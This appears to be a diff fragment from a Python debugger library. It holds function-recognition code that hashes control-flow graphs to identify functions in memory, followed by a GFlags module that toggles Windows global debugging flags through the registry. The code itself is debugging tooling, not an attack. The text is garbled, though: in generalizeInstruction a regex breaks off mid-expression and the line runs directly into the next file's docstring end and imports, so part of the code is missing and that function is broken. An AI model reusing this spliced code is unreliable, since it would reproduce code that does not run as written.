+ @type reference: STRING
+ @param reference: base64 representation of the compressed information about the function
+
+ @type refFirstCall: STRING
+ @param refFirstCall: the same, but following the function pointed by the first call in the first BB.
+ (OPTIONAL)
+
+ @rtype: INTEGER
+ @return: heuristic threasold to consider a real function match
+ """
+
+ #self.imm.Log("checking heuristically: %08X" % address)
+
+ #do the hard work just one time
+ if self.heuristicCache.has_key(address):
+ cfg = self.heuristicCache[address]
+ else:
+ cfg = self.makeFunctionHashHeuristic(address)
+ self.heuristicCache[address] = cfg
+
+ #check reference against our cache
+ sha1 = hashlib.sha1(reference+refFirstCall).digest()
+ if self.heuristicReferencesCache.has_key(sha1):
+ refcfg = self.heuristicReferencesCache[sha1]
+ else:
+ #This's the reference hash to compare with (uncompress just once and cache the results)
+ #Decode each BB-hash
+ refcfg = []
+ refcfg.append([])
+ refcfg.append([])
+ data = binascii.a2b_base64(reference)
+ for o in range(0,len(data),12):
+ (start, left, right) = struct.unpack("LLL",data[o:o+12])
+ refcfg[0].append([ start, left, right ])
+ if refFirstCall:
+ data = binascii.a2b_base64(refFirstCall)
+ for o in range(0,len(data),12):
+ (start, left, right) = struct.unpack("LLL",data[o:o+12])
+ refcfg[1].append([ start, left, right ])
+ self.heuristicReferencesCache[sha1] = refcfg
+
+ perc1 = self.compareHeuristic(cfg[0][:], refcfg[0][:])
+ if cfg[1] or refcfg[1]:
+ perc2 = self.compareHeuristic(cfg[1][:], refcfg[1][:])
+ #use the average
+ perc = (perc1 + perc2) / 2
+ else:
+ perc = perc1
+
+ return perc
+
+ def compareHeuristic(self, cfg, refcfg):
+ #for tmp in cfg:
+ #self.imm.Log("check start: %08X - left: %08X - right: %08X" % (tmp[0],tmp[1],tmp[2]))
+
+ #for tmp in refcfg:
+ #self.imm.Log("ref start: %08X - left: %08X - right: %08X" % (tmp[0],tmp[1],tmp[2]))
+
+ diff = eq = 0
+ checked = []
+ #Compare each BB-hash
+ for info in cfg:
+ bbeq = value = 0
+ for rinfo in refcfg:
+ tmp = 0
+ if info[0] == rinfo[0]: tmp += 1
+ if info[1] == rinfo[1]: tmp += 1
+ if info[2] == rinfo[2]: tmp += 1
+ if tmp > bbeq:
+ bbeq = tmp
+ value = rinfo
+ if bbeq == 3: break
+ try:
+ idx=refcfg.index(value)
+ refcfg.pop(idx)
+ except ValueError:
+ pass
+ #self.imm.Log("value %s not found in refcfg" % value)
+ eq += bbeq
+ diff += 3 - bbeq
+
+ #crossed check
+ for rinfo in refcfg:
+ bbeq = value = 0
+ for info in cfg:
+ tmp = 0
+ if info[0] == rinfo[0]: tmp += 1
+ if info[1] == rinfo[1]: tmp += 1
+ if info[2] == rinfo[2]: tmp += 1
+ if tmp > bbeq:
+ bbeq = tmp
+ value = rinfo
+ if bbeq == 3: break
+ try:
+ idx=cfg.index(value)
+ cfg.pop(idx)
+ except ValueError:
+ pass
+ #self.imm.Log("value %s not found in cfg" % value)
+ eq += bbeq
+ diff += 3 - bbeq
+
+ #self.imm.Log("eq=%d, diff=%d" % (eq,diff))
+ return eq * 100 / (eq + diff)
+
+ def makeFunctionHashHeuristic(self, address, compressed = False, followCalls = True):
+ """
+ Consider:
+ - Control Flow Graph
+ - generalized instructions that:
+ access memory/write memory/use registers/use constant/call/jmp/jmc
+ and all his combinations.
+ - special case of functions with just 1 BB and a couple of calls (follow the first call)
+
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @type compressed: Boolean
+ @param compressed: return a compressed base64 representation or the raw data
+
+ @type followCalls: Boolean
+ @param followCalls: follow the first call in a single basic block function
+
+ @rtype: LIST
+ @return: the first element is described below and the second is the result of this same function but over the first
+ call of a single basic block function (if applies), each element is like this:
+ a base64 representation of the compressed version of each bb hash:
+ [4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+ 0 <= i < BB count
+ or the same but like a LIST with raw data.
+ """
+
+ f = self.imm.getFunction(address)
+ bbs = f.getBasicBlocks()
+ bbmap = {}
+ cfg = {}
+
+ #Make a control flow graph
+ for bb in bbs:
+ cfg[bb.getStart()] = bb.getEdges()
+
+ #Make a hash of each BB
+ for bb in bbs:
+ bbhash_data = []
+ for op in bb.getInstructions(self.imm):
+ #take into account just information about the opcode
+ instr = []
+ instr.append(op.getMemType())
+ instr.append(op.indexed)
+ instr.append(op.getCmdType())
+ instr.append(op.optype[0])
+ instr.append(op.optype[1])
+ instr.append(op.optype[2])
+ instr.append(op.getSize())
+ bbhash_data.append(self.hash_a_list(instr))
+ bbhash = self.hash_a_list(bbhash_data)
+ bbmap[bb.getStart()] = bbhash
+
+ #Replace BB addresses with hashes
+ rcfg = []
+ for start,edges in cfg.iteritems():
+ rstart = 0
+ redges = [0, 0]
+ rstart = bbmap[start]
+ if bbmap.has_key(edges[0]):
+ redges[0] = bbmap[edges[0]]
+ if bbmap.has_key(edges[1]):
+ redges[1] = bbmap[edges[1]]
+ rcfg.append([ rstart,redges[0],redges[1] ])
+
+ #special case for functions with just one basic block and one or more calls
+ firstcall = []
+ if followCalls and len(bbs) == 1 and len(bbs[0].getCalls()) > 0:
+ #we follow the first call and do the same work there, but avoiding recursion
+ #XXX: why the first?
+ op = self.imm.Disasm(bbs[0].getCalls()[0])
+ if op.getJmpConst():
+ firstcall = self.makeFunctionHashHeuristic(op.getJmpConst(), compressed, followCalls=False)[0]
+ #self.imm.Log("following first call to: %08X" % op.getJmpConst())
+ del op
+
+ del bbs
+ del f
+ rcfg.sort()
+
+ if compressed:
+ #make the final hash
+ fhash = ""
+ for data in rcfg:
+ #[4 bytes BB(i) start][4 bytes BB(i) 1st edge][4 bytes BB(i) 2nd edge]
+ fhash += struct.pack("LLL", data[0], data[1], data[2])
+ return [ binascii.b2a_base64(fhash)[:-1], firstcall ]
+ else:
+ return [ rcfg, firstcall ]
+
+ def hash_a_list(self,data):
+ """
+ Take a list and return a binary representation of his CRC32.
+
+ @type data: LIST
+ @param data: a list of elements to make the hash
+
+ @rtype: UNSIGNED LONG
+ @return: a hash of the given values
+ """
+
+ ret = 0
+ for elem in data:
+ ret = binascii.crc32(str(elem), ret)
+ return struct.unpack("L", struct.pack("l",ret))[0]
+
+ def searchFunctionByHeuristic(self, csvline, heuristic = 90, module = None):
+ """
+ Search memory to find a function that fullfit the options.
+
+ @type csvline: STRING
+ @param csvline: A line of a Data CSV file. This's a simple support for copy 'n paste from a CSV file.
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @type module: STRING
+ @param module: name of a module to restrict the search
+
+ @rtype: LIST
+ @return: a list of tuples with possible function's addresses and the heauristic match percentage
+ """
+
+ line = csv.reader([csvline]).next()
+ if len(line) < 9: line[7] = "" #support for older entries
+ return self._searchFunctionByHeuristic(line[1], line[2], line[3], line[4], heuristic, module, string.split(line[7],"|"))
+
+ def _searchFunctionByHeuristic(self, search, functionhash=None, firstcallhash=None, exact=None, heuristic = 90, module = None, firstbb = None):
+ """
+ Search memory to find a function that fullfit the options.
+
+ @type search: STRING
+ @param search: searchCommand string to make the first selection
+
+ @type functionhash: STRING
+ @param functionhash: the primary function hash (use makeFunctionHash to generate this value)
+
+ @type firstcallhash: STRING
+ @param firstcallhash: the hash of the first call on single BB functions (use makeFunctionHash to generate this value)
+
+ @type exact: STRING
+ @param exact: an exact function hash, this's a binary byte-per-byte hash (use makeFunctionHash to generate this value)
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @type module: STRING
+ @param module: name of a module to restrict the search
+
+ @type firstbb: STRING
+ @param firstbb: generalized assembler of the first BB (to search function begin)
+
+ @rtype: LIST
+ @return: a list of tuples with possible function's addresses and the heauristic match percentage
+ """
+
+ #if the first argument is a LIST, decode it to each real argument of the function, following the order in the CSV file.
+ #this give us a simple support for copy 'n paste from the CSV file.
+ if isinstance(search, list):
+ search.reverse()
+ tmp = search[:]
+ if tmp: search = tmp.pop()
+ if tmp: functionhash = tmp.pop()
+ if tmp: firstcallhash = tmp.pop()
+ if tmp: exact = tmp.pop()
+ if tmp: version = tmp.pop()
+ if tmp: file = tmp.pop()
+ if tmp: firstbb = tmp.pop()
+
+ #this arguments are mandatory
+ if not search or not functionhash:
+ return None
+
+ if not firstcallhash:
+ firstcallhash = ""
+
+ heu_addy = None
+ heu_perc = 0
+ poss_functions = []
+ poss_return = []
+ search = string.replace(search, "\\n","\n")
+ if search:
+ if module:
+ #XXX: access directly isn't the best way to do this
+ for key,mod in debugger.Getallmodules().iteritems():
+ if module.lower() in key.lower():
+ poss_functions += self.imm.searchCommandsOnModule(mod[0], search)
+ else:
+ poss_functions = self.imm.searchCommands(search)
+ if poss_functions:
+ for poss in poss_functions:
+ #self.imm.Log("possible funct: %08X" % poss[0])
+ addy = self.imm.getFunctionBegin(poss[0])
+ if not addy:
+ #check entrypoint routine
+ for mod in self.imm.getAllModules().values():
+ if mod.getMainentry():
+ #self.imm.Log("mainentry: %08X" % mod.getMainentry())
+ f = StackFunction(self.imm, mod.getMainentry())
+ if f.isInsideFunction(poss[0]):
+ addy = mod.getMainentry()
+ break
+ if not addy and firstbb:
+ #self.imm.Log("Trying with the new firstbb")
+ addy = self.findBasicBlockHeuristically(poss[0], firstbb)
+ if not addy and firstbb:
+ tmp = self.findFirstBB(poss[0])
+ if tmp:
+ #self.imm.Log("Trying with the new firstbb 2nd try:%X"%tmp,tmp)
+ addy = self.findBasicBlockHeuristically(tmp, firstbb)
+ if not addy:
+ addy = poss[0]
+ #self.imm.Log("possible start: %08X" % addy)
+
+ #Make a comparision using an Exact Hash
+ if exact:
+ test = self.makeFunctionHashExact(addy)
+ if exact == test and not firstcallhash:
+ #self.imm.Log("EXACT match")
+ #when we find an exact match, we don't need to search anymore
+ return [ (addy, 100) ]
+
+ perc = self.checkHeuristic(addy, functionhash, firstcallhash)
+ #self.imm.Log("function %08X similar in %d%%" % (addy, perc))
+ if perc >= heuristic:
+ poss_return.append( (addy,perc) )
+ #self.imm.Log("HEURISTIC match")
+ return poss_return
+
+ def searchFunctionByName(self, name, heuristic = 90, module = None, version = None):
+ """
+ Look up into our dictionaries to find a function match.
+
+ @type name: STRING
+ @param name: Name of the function to search
+
+ @type module: STRING
+ @param module: name of a module to restrict the search
+
+ @type version: STRING
+ @param version: restrict the search to the given version
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @rtype: LIST
+ @return: a list of tuples with possible function's addresses and the heauristic match percentage
+ """
+ #the name is case insensitive
+ name = name.lower()
+
+ #Heuristic search
+ poss_return = []
+ for data in self.dictionaries:
+ if name == data[0].lower():
+ #support version matching
+ if version and version.lower() != data[6].lower():
+ continue
+
+ #self.imm.Log("trying with: %s, version: %s" % ( data[0], data[5]))
+ if len(data) < 9: data[7] = "" #support for older entries
+ poss_return += self._searchFunctionByHeuristic(data[1], data[2], data[3], data[4], heuristic, module, string.split(data[7],"|"))
+ return poss_return
+
+ def makeFunctionHashExact(self, address):
+ """
+ Return a SHA-1 hash of the function, taking the raw bytes as data.
+
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @rtype: STRING
+ @return: SHA-1 hash of the function
+ """
+
+ f = self.imm.getFunction(address)
+ bbs = f.getBasicBlocks()
+ bucket = ""
+ data = {}
+
+ for bb in bbs:
+ data[bb.getStart()] = self.imm.readMemory(bb.getStart(), bb.getSize())
+
+ keys = data.keys()
+ keys.sort()
+
+ for key in keys:
+ bucket += data[key]
+
+ hash = hashlib.sha1(bucket).hexdigest()
+ del bucket
+ del bbs
+ del f
+ return hash
+
+ def makeFunctionHash(self, address, compressed = False):
+ """
+ Return a list with the best BB to use for a search and the heuristic hash
+ of the function. This two components are the function hash.
+
+ @type address: DWORD
+ @param address: address of the function to hash
+
+ @type compressed: Boolean
+ @param compressed: return a compressed base64 representation or the raw data
+
+ @rtype: LIST
+ @return: 1st element is the generalized instructions to use with searchCommand
+ 2nd element is the heuristic function hash (makeFunctionHashHeuristic)
+ 3rd element is an exact hash of the function (makeFunctionHashExact)
+ 4th element is a LIST of generalized instructions of the first BB (to find the function begin)
+ """
+
+ ret = []
+ ret.append(self.selectBasicBlock(address))
+ ret.append(self.makeFunctionHashHeuristic(address, compressed))
+ ret.append(self.makeFunctionHashExact(address))
+ ret.append(self.generalizeFunction(address)[1][1])
+ return ret
+
+ def selectBasicBlock(self, address):
+ bbs = self.generalizeFunction(address)
+
+ #make some punctuation to get the BB with major diversity and
+ #quantity of instructions
+ hpoints = bb = 0
+ for id, instrs in bbs[1].iteritems():
+ map = {}
+ sum = 0
+ for instr in instrs:
+ sum += 1
+ base = instr.split(" ")
+ if "REP" in base[0]:
+ base = base[0] + " " + base[1]
+ else:
+ base = base[0]
+ map[base] = True
+ if sum > 7: break
+
+ #it's four times more important diversity than quantity
+ #We can use 8 instructions to search, so priorize diversity
+ points = sum + len(map)*4
+ if points > hpoints:
+ #self.imm.Log("new hpoint (%d, last %d): %s" % (points,hpoints,instrs[0:8]))
+ #self.imm.Log("sum: %d diver: %d" % (sum, len(map)))
+ hpoints = points
+ bb = id
+ ret = ""
+ if bb:
+ ret = string.join(bbs[1][bb][0:8],"\\n")
+ del bbs
+ return ret
+
+ def generalizeFunction(self, address):
+ """
+ Take an address an return a generalized version of the function, dismissing
+ address and register dependant information.
+
+ @type address: DWORD
+ @param address: address to the function begin
+
+ @rtype: LIST
+ @return: the 1st value is a DICTIONARY of a Control Flow Graph of the
+ BB conexions (each BB have an arbitrary ID)
+ the 2nd value is a DICTIONARY using this arbitrary BB ID as the key
+ and a LIST of searchCommand suitable, generalized instructions.
+ """
+ bbcount = 1
+ bbmap = {}
+ cfg = {}
+ bbinfo = {}
+
+ f = self.imm.getFunction(address)
+ bbs = f.getBasicBlocks()
+
+ #Make a control flow graph
+ for bb in bbs:
+ if not bbmap.has_key(bb.getStart()):
+ bbmap[bb.getStart()] = bbcount
+ bbcount += 1
+ if not bbmap.has_key(bb.getEdges()[0]):
+ bbmap[bb.getEdges()[0]] = bbcount
+ bbcount += 1
+ if not bbmap.has_key(bb.getEdges()[1]):
+ bbmap[bb.getEdges()[1]] = bbcount
+ bbcount += 1
+
+ cfg[bbmap[bb.getStart()]] = [ bbmap[bb.getEdges()[0]], bbmap[bb.getEdges()[1]] ]
+
+ regex = []
+ for op in bb.getInstructions(self.imm):
+ asm = self.generalizeInstruction(op)
+ regex.append(asm)
+ #self.imm.Log("%s --> %s" % (op.getDisasm(), asm))
+ bbinfo[bbmap[bb.getStart()]] = regex
+
+ del bbs
+ del f
+ del regex
+ return [ cfg, bbinfo ]
+
+ def generalizeInstruction(self, inp):
+ """
+ Generalize an instruction given an address or an opCode instance
+
+ @type inp: DWORD|OpCode OBJECT
+ @param inp: address to generalize or opcode to generalize
+
+ @rtype: STRING
+ @return: a generalized assembler instruction
+ """
+ if not isinstance(inp, opCode):
+ op = self.imm.Disasm(inp)
+ else: op = inp
+
+ asm = op.getDisasm()
+
+ #replace the constants inside the opcode to the word CONST
+ if op.isConditionalJmp():
+ asm = "JCC CONST"
+ if op.getImmConst() or op.operand[0][0] == DEC_CONST:
+ #self.imm.Log("const part:%X"%op.getImmConst())
+ r = re.compile("(?<=[ ,\[])[a-z0-9_\.\@\-]*%X" % op.getImmConst(), re.I)
+ asm = r.sub('CONST', asm)
+ if op.getImmConst() > 0xFFFFBFFF:
+ #self.imm.Log("neg part!. %X: %X"%(op.getImmConst(),op.getImmConst()-0x100000000))
+ r = re.compile("(?<=[ ,\[])[a-z0-9_\.\@\-]*\%X" % (op.getImmConst()-0x100000000), re.I)
+ asm = r.sub('CONST', asm)
+ if op.getAddrConst():
+ if not op.indexed:
+ asm = asm.split("[")[0]+"[CONST]"+asm.split("]")[1]
+ else:
+ tmp = "%+X" % struct.unpack("l", struct.pack("L", op.getAddrConst()))
+ asm = asm.replace(tmp,"+CONST")
+ if op.getJmpConst():
+ r = re.compile("(?<=[ ,\[])[a-z0-9_\.\-\@]*%X" % op.getJmpConst(), re.I)
+ asm = r.sub('CONST', asm)
+
+ # --> CONST
+ asm = re.sub(r'(?i)<[a-z\.&_0-9\@\-]+>', "CONST", asm)
+
+ #CALL schannel._SetWrapNoEncrypt@12 --> CONST
+ asm = re.sub(r'(?i)[a-z\.&_0-9\@\-]+\.[a-z\.&_0-9\@\-]+',"CONST", asm)
+
+ #generalize registers
+ if not op.getAddrConst() or not op.indexed:
+ asm = re.sub(r'(?i)(?}
+
+
+"""
+#
+__version__ = '1.0'
+
+import _winreg
+
+# Documentation
+# http://msdn2.microsoft.com/en-us/library/cc265944.aspx
+# http://msdn2.microsoft.com/en-us/library/cc265944.aspx
+
+
+#Systemwide settings ("Registry") HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\GlobalFlag
+#Program-specific settings ("Image file") for all users of the computer. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\GlobalFlag
+#Program-specific settings ("Image file") for a specified user of the computer. HKEY_USERS\SID\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\GlobalFlag
+#Page heap options for an image file for all users of the computer HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\PageHeapFlags
+#Page heap options for an image file for a specified user of the computer HKEY_USERS\SID\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\PageHeapFlags
+#User mode stack trace database size (tracedb) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ImageFileName\StackTraceDatabaseSizeInMbz
+
+GFlagsTags = ['ddp', 'kst', 'ust', 'dic', 'dwl', 'dhc', 'dps', 'dpd', 'dse', 'cse', 'vrf', 'bhd', 'ece', 'd32', 'eel', 'hfc', 'hpc', 'htg', 'htd', 'htc', 'hvc', 'ksl', 'eot', 'hpa', 'ptg', 'scb', 'ltd', 'otl', 'sls', 'soe', 'shg']
+
+GFlagsRef = {}
+GFlagsRef['ddp'] = ('Buffer DbgPrint output', 0x08000000, 'FLG_DISABLE_DBGPRINT', ['Systemwide registry entry', 'kernel mode.'], """Suppresses debugger output from DbgPrint(), DbgPrintEx(), KdPrint(), and KdPrintEx() calls. When this output is suppressed, it does not automatically appear in the kernel debugger. However, it can still be accessed by using the !dbgprint debugger extension. """)
+GFlagsRef['kst'] = ('Create kernel mode stack trace database', 0x2000, 'FLG_KERNEL_STACK_TRACE_DB', ['Systemwide registry entry.'], """Creates a run-time stack trace database of kernel operations, such as resource objects and object management operations. This feature works only when using a "checked build," that is, an internal debugging build of the operating system. """)
+GFlagsRef['ust'] = ('Create user mode stack trace database', 0x1000, 'FLG_USER_STACK_TRACE_DB', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Creates a run-time stack trace database in the address space of a particular process (image file mode) or all processes (systemwide). """)
+GFlagsRef['dic'] = ('Debug initial command', 0x4, 'FLG_DEBUG_INITIAL_COMMAND', ['Systemwide registry entry', 'kernel mode.'], """Runs Winlogon in the Windows Symbolic Debugger (Ntsd.exe) with the -d parameter, which directs its output to the kernel debugger console. """)
+GFlagsRef['dwl'] = ('Debug Winlogon', 0x04000000, 'FLG_DEBUG_INITIAL_COMMAND_EX', ['Systemwide registry entry', 'kernel mode.'], """Runs Winlogon in the Windows Symbolic Debugger (Ntsd.exe) with the following options: """)
+GFlagsRef['dhc'] = ('Disable heap coalesce on free', 0x00200000, 'FLG_HEAP_DISABLE_COALESCING', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Leaves adjacent blocks of heap memory separate when they are freed. By default, the system combines ("coalesces") newly freed adjacent blocks into a single block. Combining the blocks takes time, but reduces fragmentation that might force the heap to allocate additional memory when it can't find contiguous memory. """)
+GFlagsRef['dps'] = ('Disable paging of kernel stacks', 0x80000, 'FLG_DISABLE_PAGE_KERNEL_STACKS', ['Systemwide registry entry', 'kernel mode.'], """Prevents paging of the kernel mode stacks of inactive threads. Generally, the kernel mode stack cannot be paged; it is guaranteed to be resident in memory. However, the system occasionally pages the kernel stacks of inactive threads. This flag prevents these occurrences. """)
+GFlagsRef['dpd'] = ('Disable protected DLL verification', 0x80000000, 'FLG_DISABLE_PROTDLLS', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """""")
+GFlagsRef['dse'] = ('Disable stack extension', 0x10000, 'FLG_DISABLE_STACK_EXTENSION', ['image file registry entry.'], """Prevents the kernel from extending the stacks of the threads in the process beyond the initial memory committed. This is used to simulate low memory conditions (where stack extensions fail) and to test the strategic system processes that are expected to run well even with low memory. """)
+GFlagsRef['cse'] = ('Early critical section event creation', 0x10000000, 'FLG_CRITSEC_EVENT_CREATION', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Creates event handles when a critical section is initialized, rather than waiting until the event is needed. When the system cannot create an event, it generates the exception during initialization and the calls to enter and leave the critical section do not fail. """)
+GFlagsRef['vrf'] = ('Enable application verifier', 0x100, 'FLG_APPLICATION_VERIFIER', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """""")
+GFlagsRef['bhd'] = ('Enable bad handles detection', 0x40000000, 'FLG_ENABLE_HANDLE_EXCEPTIONS', ['Systemwide registry entry', 'kernel mode.'], """Raises a user mode exception (STATUS_INVALID_HANDLE) whenever a user mode process passes an invalid handle to the Object Manager. """)
+GFlagsRef['ece'] = ('Enable close exception', 0x00400000, 'FLG_ENABLE_CLOSE_EXCEPTIONS', ['Systemwide registry entry', 'kernel mode.'], """Raises a user mode exception whenever an invalid handle is passed to the CloseHandle() interface or related interfaces, such as SetEvent(), that take handles as arguments. """)
+GFlagsRef['d32'] = ('Enable debugging of Win32 subsystem', 0x20000, 'FLG_ENABLE_CSRDEBUG', ['Systemwide registry entry', 'kernel mode.'], """""")
+GFlagsRef['eel'] = ('Enable exception logging', 0x00800000, 'FLG_ENABLE_EXCEPTION_LOGGING', ['Systemwide registry entry', 'kernel mode.'], """Creates a log of exception records in the kernel run-time library. You can access the log from the kernel debugger. """)
+GFlagsRef['hfc'] = ('Enable heap free checking', 0x20, 'FLG_HEAP_ENABLE_FREE_CHECK', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Validates the heap when it is freed. """)
+GFlagsRef['hpc'] = ('Enable heap parameter checking', 0x40, 'FLG_HEAP_VALIDATE_PARAMETERS', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Verifies some aspects of the heap whenever a heap API is called. """)
+GFlagsRef['htg'] = ('Enable heap tagging', 0x800, 'FLG_HEAP_ENABLE_TAGGING', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Assigns unique tags to heap allocations. You can display the tag by using the !heap debugger extension with the -t parameter. """)
+GFlagsRef['htd'] = ('Enable heap tagging by DLL', 0x8000, 'FLG_HEAP_ENABLE_TAG_BY_DLL', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Assigns a unique tag to heap allocations created by the same DLL. You can display the tag by using the !heap debugger extension with the -t parameter. """)
+GFlagsRef['htc'] = ('Enable heap tail checking', 0x10, 'FLG_HEAP_ENABLE_TAIL_CHECK', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Checks for buffer overruns when the heap is freed. This flag adds a short pattern to the end of each allocation. The Windows heap manager detects the pattern when the block is freed and, if the block was modified, the heap manager breaks into the debugger. """)
+GFlagsRef['hvc'] = ('Enable heap validation on call', 0x80, 'FLG_HEAP_VALIDATE_ALL', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Validates the entire heap each time a heap API is called. """)
+GFlagsRef['ksl'] = ('Enable loading of kernel debugger symbols', 0x40000, 'FLG_ENABLE_KDEBUG_SYMBOL_LOAD', ['Systemwide registry entry', 'kernel mode.'], """Loads kernel symbols into the kernel memory space the next time the system starts. The kernel symbols are used in kernel profiling and by advanced kernel debugging tools. """)
+GFlagsRef['eot'] = ('Enable object handle type tagging', 0x01000000, 'FLG_ENABLE_HANDLE_TYPE_TAGGING', ['Systemwide registry entry', 'kernel mode.'], """This flag appears in Gflags, but it has no effect on the operating system. """)
+GFlagsRef['hpa'] = ('Enable page heap', 0x02000000, 'FLG_HEAP_PAGE_ALLOCS', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Turns on page heap debugging, which verifies dynamic heap memory operations, including allocations and frees, and causes a debugger break when it detects a heap error. """)
+GFlagsRef['ptg'] = ('Enable pool tagging', 0x400, 'FLG_POOL_ENABLE_TAGGING', ['Systemwide registry entry.'], """Collects data and calculates statistics about pool memory allocations. The data is grouped by pool tag value. Several tools that diagnose memory leaks and other kernel pool errors use the resulting data. """)
+GFlagsRef['scb'] = ('Enable system critical breaks', 0x100000, 'FLG_ENABLE_SYSTEM_CRIT_BREAKS', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """For per-process (image file) only: Forces a system breakpoint into the debugger whenever the specified process stops abnormally. This flag is effective only when the process calls the RtlSetProcessBreakOnExit() and RtlSetThreadBreakOnExit() interfaces. """)
+GFlagsRef['ltd'] = ('Load DLLs top-down', 0x20000000, 'FLG_LDR_TOP_DOWN', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Loads DLLs at the highest possible address. This flag is used to test 64-bit code for pointer truncation errors, because the most significant 32 bits of the pointers are not zeroes. It is designed for code running on the 64-bit versions of the Windows Server 2003. """)
+GFlagsRef['otl'] = ('Maintain a list of objects for each type', 0x4000, 'FLG_MAINTAIN_OBJECT_TYPELIST', ['Systemwide registry entry', 'kernel mode.'], """Collects and maintains a list of active objects by object type (for example, event, mutex, and semaphore). """)
+GFlagsRef['sls'] = ('Show loader snaps', 0x2, 'FLG_SHOW_LDR_SNAPS', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """Captures detailed information about the loading and unloading of executable images and their supporting library modules. """)
+GFlagsRef['soe'] = ('Stop on exception', 0x1, 'FLG_STOP_ON_EXCEPTION', ['Systemwide registry entry', 'kernel mode', 'image file registry entry.'], """The kernel breaks into the kernel debugger whenever a kernel mode exception occurs. The system passes all first chance exceptions (except for STATUS_PORT_DISCONNECT) with a severity of Warning or Error to the debugger before passing them to a local exception handler. """)
+GFlagsRef['shg'] = ('Stop on hung GUI', 0x8, 'FLG_STOP_ON_HUNG_GUI', ['kernel mode'], """""")
+
+
+# For a complete usage of this Class, check the Pycommand 'gflags.py'
+class GFlags:
+ def __init__(self, processname = ""):
+ """
+ GFlags class enable and disable Windows global flags
+
+ @type processname: STRING
+ @param processname: (Optional) Process name (If is unset, it will use the system global flags)
+ """
+ self.processname = processname
+
+ if self.processname:
+ self.subkey = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\%s" % self.processname
+ else:
+ self.subkey = "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\"
+
+
+ def _query(self):
+ try:
+ hkey = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, self.subkey)
+ except WindowsError:
+ raise Exception, "Cannot Openkey for Query (%s)" % self.subkey
+
+ try:
+ return _winreg.QueryValueEx(hkey, "GlobalFlag")[0]
+ except WindowsError:
+ raise Exception, "Cannot Query value (%s\\%s)" % (self.subkey, "GlobalFlag")
+
+ def GetReferencebyName(self, val):
+ """
+ Get Flag information by its shorcut name
+
+ @type val: STRING
+ @param val: Shortcut Name
+
+ @rtype: TUPLE
+ @return: A tuple containning all the internal information of a Flag
+ """
+ val = val.lower()
+ try:
+ r = GFlagsRef[val]
+ except KeyError:
+ raise Exception, "'%s' is not a gflag value" % val
+ if self.processname:
+ if 'image file registry entry.' not in r[3]:
+ raise Exception, "Flag '%s' is not available for Image file (only for: %s)" % (val, str(r[3]))
+
+ return r
+
+ def SetbyName(self, val):
+ """
+ Set a Flag by its shorcut name
+
+ @type val: STRING
+ @param val: Shortcut Name
+ """
+ r = self.GetReferencebyName( val )
+ return self.Set( r[1] )
+
+ def Set(self, val):
+ """
+ Set a Flag
+
+ @type val: DWORD
+ @param val: Value of the flag to set
+ """
+
+ try:
+ current = self._query()
+ except Exception:
+ # Key is not created, set will automatically do it
+ current = 0L
+
+ self._set( current | val )
+
+ return current | val
+
+ def UnSetbyName(self, val):
+ """
+ Unset a Flag by its shorcut name
+
+ @type val: STRING
+ @param val: Shortcut Name
+ """
+ r = self.GetReferencebyName( val )
+ return self.UnSet( r[1] )
+
+ def UnSet(self, val):
+ """
+ Set a Flag
+
+ @type val: DWORD
+ @param val: Value of the flag to set
+ """
+
+ current = self._query()
+ self._set( current &~ val )
+
+ return current &~ val
+
+ def isSet(self, val):
+ """
+ Whether a Flag is set
+
+ @type val: STRING
+ @param val: Shortcut name
+ """
+
+ r = self.GetReferencebyName( val )
+ current = self._query()
+
+ return bool( r[1] & current )
+
+ def Print(self):
+ """
+ Print all the current setted GFlags
+
+ @rtype: LIST OF TUPLES
+ @return: A list of a tuple with two elements: Shortcut Name and flag information
+ """
+ current = self._query()
+ ret = []
+ for a in GFlagsRef.keys():
+ r = GFlagsRef[a]
+ if r[1] & current:
+ ret.append ( (a, r) )
+ return ret
+
+ def Clear(self):
+ """
+ Clear the Flags
+ """
+ if self.processname:
+ _winreg.DeleteKey(_winreg.HKEY_LOCAL_MACHINE, self.subkey)
+ else:
+ self._set( 0 )
+
+ def _set(self, flag):
+ try:
+ hkey = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, self.subkey, 0, _winreg.KEY_SET_VALUE )
+ except WindowsError:
+ try:
+ hkey = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE, self.subkey)
+ except WindowsError:
+ raise Exception, "Cannot Open/Create key (%s)" % self.subkey
+
+ try:
+ _winreg.SetValueEx(hkey, "GlobalFlag", 0, _winreg.REG_DWORD, int(flag) )
